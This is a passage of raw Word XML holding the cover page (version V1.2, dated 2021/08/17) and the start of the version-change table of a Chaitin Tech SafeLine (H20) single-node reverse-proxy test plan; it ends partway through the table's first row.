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6186C">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc522894805"/>
      <w:bookmarkStart w:id="1" w:name="_Toc522823511"/>
      <w:bookmarkStart w:id="196" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="196"/>
      <w:r>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-931545</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-878205</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7622540" cy="10775315"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="240393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347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622540" cy="10775315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B3E4E4">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E60C9D4">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="422BC366">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F403C9">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ABF01A4">
      <w:pPr>
        <w:pStyle w:val="89"/>
        <w:spacing w:after="163"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="68"/>
          <w:szCs w:val="68"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="68"/>
          <w:szCs w:val="68"/>
        </w:rPr>
        <w:t>长亭科技</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74962E8D">
      <w:pPr>
        <w:pStyle w:val="89"/>
        <w:spacing w:after="163"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="68"/>
          <w:szCs w:val="68"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="68"/>
          <w:szCs w:val="68"/>
        </w:rPr>
        <w:t>雷池(H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="68"/>
          <w:szCs w:val="68"/>
        </w:rPr>
        <w:t>20)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="68"/>
          <w:szCs w:val="68"/>
        </w:rPr>
        <w:t>单机反代测试方案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C445FD7">
      <w:pPr>
        <w:pStyle w:val="82"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="767171" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体"/>
          <w:color w:val="767171" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5080</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>20955</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>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0369C71E">
                            <w:pPr>
                              <w:widowControl/>
                              <w:tabs>
                                <w:tab w:val="left" w:pos="2459"/>
                              </w:tabs>
                              <w:adjustRightInd/>
                              <w:snapToGrid/>
                              <w:spacing w:after="0" w:afterLines="0" w:line="360" w:lineRule="auto"/>
                              <w:ind w:firstLine="0" w:firstLineChars="0"/>
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
                                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="15"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
                                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="15"/>
                              </w:rPr>
                              <w:t>版本</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
                                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="15"/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="begin"/>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
                                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="15"/>
                              </w:rPr>
                              <w:instrText xml:space="preserve"> STYLEREF  长亭版本号  \* MERGEFORMAT </w:instrText>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
                                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="15"/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="separate"/>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
                                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="15"/>
                              </w:rPr>
                              <w:t>V1.2</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
                                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="15"/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
                                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="15"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0C086E04">
                            <w:pPr>
                              <w:spacing w:after="163" w:line="360" w:lineRule="auto"/>
                              <w:ind w:firstLine="0" w:firstLineChars="0"/>
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
                                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
                                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="15"/>
                              </w:rPr>
                              <w:t>2</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
                                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="15"/>
                              </w:rPr>
                              <w:t>02</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
                                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="15"/>
                              </w:rPr>
                              <w:t>1</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
                                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="15"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> / </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
                                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="15"/>
                              </w:rPr>
                              <w:t>08</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
                                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="15"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> / </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
                                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="15"/>
                              </w:rPr>
                              <w:t>17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left:0.4pt;margin-top:1.65pt;height:110.6pt;width:185.9pt;z-index:251661312;mso-width-relative:margin;mso-height-relative:margin;mso-width-percent:400;mso-height-percent:200;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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QDmLdUAAAAGAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgA&#10;h07iQDE5faEoAgAALAQAAA4AAAAAAAAAAQAgAAAAJAEAAGRycy9lMm9Eb2MueG1sUEsFBgAAAAAG&#10;AAYAWQEAAL4FAAAAAA==&#10;">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke on="f" miterlimit="8" joinstyle="miter"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
                <v:textbox style="mso-fit-shape-to-text:t;">
                  <w:txbxContent>
                    <w:p w14:paraId="0369C71E">
                      <w:pPr>
                        <w:widowControl/>
                        <w:tabs>
                          <w:tab w:val="left" w:pos="2459"/>
                        </w:tabs>
                        <w:adjustRightInd/>
                        <w:snapToGrid/>
                        <w:spacing w:after="0" w:afterLines="0" w:line="360" w:lineRule="auto"/>
                        <w:ind w:firstLine="0" w:firstLineChars="0"/>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
                          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="15"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
                          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="15"/>
                        </w:rPr>
                        <w:t>版本</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
                          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="15"/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
                          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="15"/>
                        </w:rPr>
                        <w:instrText xml:space="preserve"> STYLEREF  长亭版本号  \* MERGEFORMAT </w:instrText>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
                          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="15"/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
                          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="15"/>
                        </w:rPr>
                        <w:t>V1.2</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
                          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="15"/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
                          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="15"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0C086E04">
                      <w:pPr>
                        <w:spacing w:after="163" w:line="360" w:lineRule="auto"/>
                        <w:ind w:firstLine="0" w:firstLineChars="0"/>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
                          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
                          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="15"/>
                        </w:rPr>
                        <w:t>2</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
                          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="15"/>
                        </w:rPr>
                        <w:t>02</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
                          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="15"/>
                        </w:rPr>
                        <w:t>1</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
                          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="15"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> / </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
                          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="15"/>
                        </w:rPr>
                        <w:t>08</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
                          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="15"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> / </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
                          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="15"/>
                        </w:rPr>
                        <w:t>17</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="361D825D">
      <w:pPr>
        <w:pStyle w:val="82"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="767171" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="251EF9A9">
      <w:pPr>
        <w:pStyle w:val="82"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="767171" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="305C9400">
      <w:pPr>
        <w:pStyle w:val="82"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="767171" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AA6820A">
      <w:pPr>
        <w:pStyle w:val="82"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="767171" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10D7A2C3">
      <w:pPr>
        <w:pStyle w:val="82"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="767171" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B8BC03F">
      <w:pPr>
        <w:pStyle w:val="82"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="767171" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B5B0D92">
      <w:pPr>
        <w:pStyle w:val="82"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="767171" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F248E53">
      <w:pPr>
        <w:pStyle w:val="82"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="767171" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="171BBE72">
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2459"/>
        </w:tabs>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0" w:line="400" w:lineRule="exact"/>
        <w:ind w:right="1540" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:color w:val="7BBF4B"/>
          <w:kern w:val="0"/>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397" w:footer="624" w:gutter="0"/>
          <w:cols w:space="425" w:num="1"/>
          <w:docGrid w:type="linesAndChars" w:linePitch="326" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E65D38A">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0" w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>版本变更记录</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="31"/>
        <w:tblW w:w="9044" w:type="dxa"/>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852"/>
        <w:gridCol w:w="2007"/>
        <w:gridCol w:w="3242"/>
        <w:gridCol w:w="1943"/>
      </w:tblGrid>
      <w:tr w14:paraId="5148225B">
        <w:trPr>
          <w:trHeight w:val="410" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1852" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43710A7B">
            <w:pPr>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:afterLines="0"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2007" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62ABF71C">
            <w:pPr>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:afterLines="0"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3242" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A33D29F">
            <w:pPr>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:afterLines="0"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>变更说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1943" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31241BB8">
            <w:pPr>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:afterLines="0"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>变更</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>人</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7C6CAA9B">
        <w:trPr>
          <w:trHeight w:val="410" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1852" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40E45821">
            <w:pPr>
              <w:pStyle w:val="80"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>09</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2007" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1315CF42">
            <w:pPr>
              <w:pStyle w:val="81"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>202</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
